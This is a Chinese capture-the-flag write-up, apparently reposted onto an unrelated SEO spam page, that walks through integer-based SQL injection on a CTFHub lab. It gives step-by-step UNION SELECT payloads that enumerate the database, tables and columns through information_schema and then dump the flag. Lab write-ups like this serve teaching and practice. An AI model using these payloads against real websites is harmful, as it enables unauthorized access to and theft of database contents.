廊坊百度推广公司地址_保定网页制作_软文写作的十大技巧_网络营销环境宏观微观分析

时间:2025/7/12 5:05:19来源：https://blog.csdn.net/weixin_73049307/article/details/142927266 浏览次数: 0次

开启靶场，打开链接：

直接指明是SQL整数型注入，但还是来判断一下

（1）检查是否存在注入点

1 and 1=1#

返回正确

1 and 1=2#

返回错误

说明存在SQL整数型注入

（2）猜字段数

1 order by 2#

1 order by 3#

说明字段数是2

（3）爆数据库名

1 and 1=2 union select 1,database()#

得知数据库名是sqli

（4）爆表名

1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表，其中flag表是我们需要的

（5）爆列名

1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#

得知flag表的列名是flag

（6）爆字段内容（flag）

1 and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功的得到flag：

ctfhub{0bdb6d621fc76a06fde34a00}

这里用sqlmap也是可以的，但我提前交了就不想再费时间重开一遍靶场了，待会就在“字符型注入”中试试了

关键字：廊坊百度推广公司地址_保定网页制作_软文写作的十大技巧_网络营销环境宏观微观分析

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

责任编辑：